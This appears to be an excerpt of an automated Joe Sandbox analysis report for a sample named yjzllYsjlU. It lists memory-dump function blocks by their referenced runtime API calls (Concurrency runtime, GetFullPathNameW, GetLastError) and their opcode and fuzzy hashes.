                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                    • String ID:
                    • API String ID: 3264154886-0
                    • Opcode ID: d95c55a17dc6c0951bf91651ac23ff9b82cafa9506b18cb5ad1f8234279d2599
                    • Instruction ID: f1422a21f4711f17ded1b57bc1739d7754d149692723227e4c16a49b22b3447a
                    • Opcode Fuzzy Hash: d95c55a17dc6c0951bf91651ac23ff9b82cafa9506b18cb5ad1f8234279d2599
                    • Instruction Fuzzy Hash: 7841CFB0A806159FDF20EF64C984B6AB7E9BF09764F04456ED829D7680EB34E604CFC1
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 021B1DA9
                      • Part of subcall function 021B2078: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,021B1AF1), ref: 021B2088
                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 021B1DBE
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 021B1DCD
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 021B1E91
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
                    • String ID:
                    • API String ID: 1312548968-0
                    • Opcode ID: 84332b62cc3de3cfa4170185330e29230a9dc1dcd046b531a1b7116e20220df0
                    • Instruction ID: dae2bda900e14038edea278e8f2fcf10ab0972ad98fedcdb77e42a53b2b3f937
                    • Opcode Fuzzy Hash: 84332b62cc3de3cfa4170185330e29230a9dc1dcd046b531a1b7116e20220df0
                    • Instruction Fuzzy Hash: 8531C539A40214BFCF17EF68C894AED73B6BF44310F214569ED1997281DB71EA05CB94
                    APIs
                    • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422D0F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: BuffersConcurrency::details::InitializeManager::Resource
                    • String ID:
                    • API String ID: 3433162309-0
                    • Opcode ID: 22ca41de25d3fddfd321250d59b84d7d3dba6f78c4a0763dc9e7bbb86f5d08b7
                    • Instruction ID: d418521b68a385beeb000fecb389156560c70f9a2eedc7cbe4bb4063ba4b2acd
                    • Opcode Fuzzy Hash: 22ca41de25d3fddfd321250d59b84d7d3dba6f78c4a0763dc9e7bbb86f5d08b7
                    • Instruction Fuzzy Hash: 56318835A00319EFCF10DF94DA80BAE7BB9BF44304F5000AAD901AB346D7B4A905CBA5
                    APIs
                    • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 021A2F76
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: BuffersConcurrency::details::InitializeManager::Resource
                    • String ID:
                    • API String ID: 3433162309-0
                    • Opcode ID: 22ca41de25d3fddfd321250d59b84d7d3dba6f78c4a0763dc9e7bbb86f5d08b7
                    • Instruction ID: 82df7c140f3ad226880f7fc08ce2cde409d3b3d2a19db3276a64e4ba2b40e53c
                    • Opcode Fuzzy Hash: 22ca41de25d3fddfd321250d59b84d7d3dba6f78c4a0763dc9e7bbb86f5d08b7
                    • Instruction Fuzzy Hash: 1A317A79E40309EFCF10DF54C5E1BAEBBB9AF44300F1400AADD65AB246D731AA44CBA0
                    APIs
                      • Part of subcall function 004369CC: _free.LIBCMT ref: 004369DA
                      • Part of subcall function 0043E926: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00444DC0,?,00000000,00000000), ref: 0043E9C8
                    • GetLastError.KERNEL32 ref: 0043D9B7
                    • __dosmaperr.LIBCMT ref: 0043D9BE
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0043D9FD
                    • __dosmaperr.LIBCMT ref: 0043DA04
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                    • String ID:
                    • API String ID: 167067550-0
                    • Opcode ID: e64aadb6d22fe51e849137b99b89815b7d15ae6c09361cf92410591095803afc
                    • Instruction ID: ee20851a037b4c6b58bdbb56dc4c6e04abe5cdf536cd6285cafdd1b842c948ea
                    • Opcode Fuzzy Hash: e64aadb6d22fe51e849137b99b89815b7d15ae6c09361cf92410591095803afc
                    • Instruction Fuzzy Hash: DB21FBF1A04605BFDB206F66AC80E2777ACEF0C368F10511AF86997251D738EC418799
                    APIs
                      • Part of subcall function 021B6C33: _free.LIBCMT ref: 021B6C41
                      • Part of subcall function 021BEB8D: WideCharToMultiByte.KERNEL32(02188A07,00000000,0045FB20,00000000,02188A07,02188A07,021C08B7,?,0045FB20,?,00000000,?,021C0626,0000FDE9,00000000,?), ref: 021BEC2F
                    • GetLastError.KERNEL32 ref: 021BDC1E
                    • __dosmaperr.LIBCMT ref: 021BDC25
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 021BDC64
                    • __dosmaperr.LIBCMT ref: 021BDC6B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                    • String ID:
                    • API String ID: 167067550-0
                    • Opcode ID: e192af22dab1e85764783ba134b35ca1a0735bfe77ce3258f04da4e50815c0b3
                    • Instruction ID: e44c73d9fe6658bff31ed586359a354cd380e1a9a23b381df81e0ba5923fe33d
                    • Opcode Fuzzy Hash: e192af22dab1e85764783ba134b35ca1a0735bfe77ce3258f04da4e50815c0b3
                    • Instruction Fuzzy Hash: A021A471680209AFDB2A5F61AC80EFAB7BEEF45376710452CE82997180D771EC409FA0
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 021B1AEC
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 021B1B0B
                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 021B1B52
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 1284976207-0
                    • Opcode ID: e9b064e3ffac3daba16c5b096d74077ea667223e78b02618e4975b94426a83e1
                    • Instruction ID: 721a3d375f241fac5dfd1a063cacd19af7c4c7530ef2d666eb2633953cb104a0
                    • Opcode Fuzzy Hash: e9b064e3ffac3daba16c5b096d74077ea667223e78b02618e4975b94426a83e1
                    • Instruction Fuzzy Hash: B4214935740615BFCF16AB28C4B4BFD73B5BF84324B02052AE419872D1DB64E841CBD4
                    APIs
                    • SetEvent.KERNEL32(?,00000000,?), ref: 00430AE9
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430AD1
                      • Part of subcall function 00428F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428F50
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430B4C
                    • SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F4C0), ref: 00430B51
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
                    • String ID:
                    • API String ID: 2734100425-0
                    • Opcode ID: 2e8a3a5ddc2bebb452bc5efae35c7b376e30f6768224933571346adf22c5373c
                    • Instruction ID: eb585ae1b4d53eae47272984182226d4372f2576b54a2ee7974d2067b554b9fa
                    • Opcode Fuzzy Hash: 2e8a3a5ddc2bebb452bc5efae35c7b376e30f6768224933571346adf22c5373c
                    • Instruction Fuzzy Hash: 54210475700224AFCB10EB59DC45D7EB7A8EF48324F15015BFA16A3292CB74AD018AA9
                    APIs
                    • SetEvent.KERNEL32(?,00000000,?), ref: 021B0D50
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 021B0D38
                      • Part of subcall function 021A9196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 021A91B7
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 021B0DB3
                    • SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F4C0), ref: 021B0DB8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
                    • String ID:
                    • API String ID: 2734100425-0
                    • Opcode ID: 2e8a3a5ddc2bebb452bc5efae35c7b376e30f6768224933571346adf22c5373c
                    • Instruction ID: e71bcaca075faf89df64f3d03d2b8ba50942fa488221dd6e1693102ed2c55bb7
                    • Opcode Fuzzy Hash: 2e8a3a5ddc2bebb452bc5efae35c7b376e30f6768224933571346adf22c5373c
                    • Instruction Fuzzy Hash: 39212679640214AFCB14EB58CC44EAEB7BDEF48360F000566FA15E32E0CB71AD01CEA5
                    APIs
                    • __EH_prolog3_catch.LIBCMT ref: 00429C9C
                    • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00429CE8
                    • std::bad_exception::bad_exception.LIBCMT ref: 00429CFE
                    • std::bad_exception::bad_exception.LIBCMT ref: 00429D6A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                    • String ID:
                    • API String ID: 2033596534-0
                    • Opcode ID: a17e9912f2dd60cabb5880328a5218807bfb4b16fff09030fc9fe1e3d2418584
                    • Instruction ID: e4f0000fdf8db68e5cd6af660122ebbf79e84cae44bb9f1680ea774d3ebdc29a
                    • Opcode Fuzzy Hash: a17e9912f2dd60cabb5880328a5218807bfb4b16fff09030fc9fe1e3d2418584
                    • Instruction Fuzzy Hash: 7F21C471A001249FCB04EF65E4829DEB7B0AF05314FA0406BF401AB2A2DB396D45DB69
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b882474e2421becce6f7ac3255c006c5444dc2a1b8804bcc2ed4a91c923f1653
                    • Instruction ID: a5c1cada26e3dd3cddc795f0cca563069386a05feb6edead2f5aeb483daa4671
                    • Opcode Fuzzy Hash: b882474e2421becce6f7ac3255c006c5444dc2a1b8804bcc2ed4a91c923f1653
                    • Instruction Fuzzy Hash: 9321D171AC9324ABCB338A659D45B9A3778AF107A8F110560FC57A7AA1D720EE00C6E4
                    APIs
                    • Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 021A5168
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 021A518B
                    • __EH_prolog3.LIBCMT ref: 021A51A6
                    • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 021A51CD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CacheConcurrency::details::GroupLocalSchedule$H_prolog3Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 2642201467-0
                    • Opcode ID: 8c7b1ccd00f45581bab929026422e21ff28f01d8dc45cb75e357af66afe4e75e
                    • Instruction ID: 4018e12544e64dde7aac9cd7a600bb083aaf71bced630ac83794b994ecbb8a89
                    • Opcode Fuzzy Hash: 8c7b1ccd00f45581bab929026422e21ff28f01d8dc45cb75e357af66afe4e75e
                    • Instruction Fuzzy Hash: AF21C139A40205FFCB14EFA8C861AAD73B6FF48311F50406AE51A9B690DB71AE01CF95
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 004313C6
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00431377
                      • Part of subcall function 0042831B: SafeRWList.LIBCONCRT ref: 0042832C
                    • SafeRWList.LIBCONCRT ref: 004313BC
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 004313DC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 336577199-0
                    • Opcode ID: 633f29ab29772fce27dba393e8379a29e8a0d8340c800c4eeedaee01f30ccdc5
                    • Instruction ID: d9e605bbb79d098c531deca9cf4cd80c541eae854b845806876d4496965d449b
                    • Opcode Fuzzy Hash: 633f29ab29772fce27dba393e8379a29e8a0d8340c800c4eeedaee01f30ccdc5
                    • Instruction Fuzzy Hash: 7521F53160020ADFC704CF24C881FA5F7E8FB48718F54E2ABD8054B552DB39E98ACB94
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 021B162D
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 021B15DE
                      • Part of subcall function 021A8582: SafeRWList.LIBCONCRT ref: 021A8593
                    • SafeRWList.LIBCONCRT ref: 021B1623
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 021B1643
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 336577199-0
                    • Opcode ID: 633f29ab29772fce27dba393e8379a29e8a0d8340c800c4eeedaee01f30ccdc5
                    • Instruction ID: fe9deef18e2d511f3a329c5108c7cc4696574f115c3ff96db47e1a1a491bc8bd
                    • Opcode Fuzzy Hash: 633f29ab29772fce27dba393e8379a29e8a0d8340c800c4eeedaee01f30ccdc5
                    • Instruction Fuzzy Hash: 4821C57169020AEFCB05DF24C890FA5FBBABF85718F15D2A6D80A4B541D771E686CBC0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 65fe2d25819fbcf81a19c36cb243a6994e9bb55f4a4ff3c1705520088a00f9a9
                    • Instruction ID: 93dccde430e015b49087399d56e285239dbe27c6e71e912574c4fd2289894e35
                    • Opcode Fuzzy Hash: 65fe2d25819fbcf81a19c36cb243a6994e9bb55f4a4ff3c1705520088a00f9a9
                    • Instruction Fuzzy Hash: B3112635E82760ABEB238F649D84B9A377C9F117A0B1106A1EC15A7290D730ED04C6E0
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041F30F
                      • Part of subcall function 0041F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425486
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0041F330
                      • Part of subcall function 004201B2: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004201CE
                    • Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0041F34C
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0041F353
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
                    • String ID:
                    • API String ID: 1684785560-0
                    • Opcode ID: 04357caceeb09c65516863605c6f7112208db5e15fbad483dcb42361f4682929
                    • Instruction ID: fbdee06be22d7eb5cf524bde3a8873450c2cdba4fa94e97b4615b2f8ae6f40be
                    • Opcode Fuzzy Hash: 04357caceeb09c65516863605c6f7112208db5e15fbad483dcb42361f4682929
                    • Instruction Fuzzy Hash: 9C012B71500309BBD720AF66CC859DBFBA8EF10358B10453FFC1492152D778E98A87A9
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0219F576
                      • Part of subcall function 0219F732: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 021A56ED
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0219F597
                      • Part of subcall function 021A0419: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 021A0435
                    • Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0219F5B3
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0219F5BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
                    • String ID:
                    • API String ID: 1684785560-0
                    • Opcode ID: 04357caceeb09c65516863605c6f7112208db5e15fbad483dcb42361f4682929
                    • Instruction ID: a2f6c3211acc010fe19e22b6900dac4dbb817a410475f6d6c7bdee7dd8e53d73
                    • Opcode Fuzzy Hash: 04357caceeb09c65516863605c6f7112208db5e15fbad483dcb42361f4682929
                    • Instruction Fuzzy Hash: 4601D6B19803057FEB307F69CC809ABBBADEF10354B10452BF865D2591D770D956CBA1
                    APIs
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 004333DB
                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 004333EF
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00433407
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043341F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                    • String ID:
                    • API String ID: 78362717-0
                    • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction ID: 148698cb8657f3ab7a0d111eac04cd811a00bb0e29ba6abd34784ed5a644fba4
                    • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction Fuzzy Hash: 74012632700524A7CF16EF658841AAFB7A99F58314F00001BFC12EB382DA74EE1193A5
                    APIs
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 021B3642
                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 021B3656
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 021B366E
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021B3686
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                    • String ID:
                    • API String ID: 78362717-0
                    • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction ID: d4a05085c661d61d41e39fd4c81e4e18a7b973d3e9466e75ebf050c871f16b1d
                    • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction Fuzzy Hash: BC01D676680114BBCF17AE69C850AEF77BA9F84350F400095EC21AB381DB70EE218AE0
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0043B9A0,00000000,?,00441FAB,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0043B851
                    • GetLastError.KERNEL32(?,00441FAB,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B9A0,00000000,00000104,?), ref: 0043B85B
                    • __dosmaperr.LIBCMT ref: 0043B862
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 573f122ae82f08db5f9a13de85ef365be3234010d0279eca2789f216f3b9dc80
                    • Instruction ID: 4d38e234b28d8319e4134ca970a631ac6953b460d6f58f575e06abf1e175f512
                    • Opcode Fuzzy Hash: 573f122ae82f08db5f9a13de85ef365be3234010d0279eca2789f216f3b9dc80
                    • Instruction Fuzzy Hash: 51F06D36600615BBCB246FA6DC08E4BBF6DFF483A1B009126F61DC6521D735E811CBD8
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0043B9A0,00000000,?,00441F36,00000000,00000000,0043B9A0,?,?,00000000,00000000,00000001), ref: 0043B8BA
                    • GetLastError.KERNEL32(?,00441F36,00000000,00000000,0043B9A0,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B9A0,00000000,00000104), ref: 0043B8C4
                    • __dosmaperr.LIBCMT ref: 0043B8CB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 8d52b872a16da2ecde656976662c890ef9145f26e1d0b0297742ad47c23117d8
                    • Instruction ID: fe454a788940d8d1b6a18dc845ad3b04fffb8540f5c3b85414d994226db15d49
                    • Opcode Fuzzy Hash: 8d52b872a16da2ecde656976662c890ef9145f26e1d0b0297742ad47c23117d8
                    • Instruction Fuzzy Hash: 26F06D72600619BB8B216BA6DC08B57BF69FF483A0B009526FA19C6521D739E861C7D8
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,021BBC07,00000000,?,021C2212,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 021BBAB8
                    • GetLastError.KERNEL32(?,021C2212,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,021BBC07,00000000,00000104,?), ref: 021BBAC2
                    • __dosmaperr.LIBCMT ref: 021BBAC9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 573f122ae82f08db5f9a13de85ef365be3234010d0279eca2789f216f3b9dc80
                    • Instruction ID: 1a5594b7b7242dc7abeb25f2300445b195a0e59c93974462e2782a47b0ff8f37
                    • Opcode Fuzzy Hash: 573f122ae82f08db5f9a13de85ef365be3234010d0279eca2789f216f3b9dc80
                    • Instruction Fuzzy Hash: CFF08132644615BB8B225FB6DC08DA6FF7AFF453A57018520F929C7820D731E911CBE0
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,021BBC07,00000000,?,021C219D,00000000,00000000,021BBC07,?,?,00000000,00000000,00000001), ref: 021BBB21
                    • GetLastError.KERNEL32(?,021C219D,00000000,00000000,021BBC07,?,?,00000000,00000000,00000001,00000000,00000000,?,021BBC07,00000000,00000104), ref: 021BBB2B
                    • __dosmaperr.LIBCMT ref: 021BBB32
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 8d52b872a16da2ecde656976662c890ef9145f26e1d0b0297742ad47c23117d8
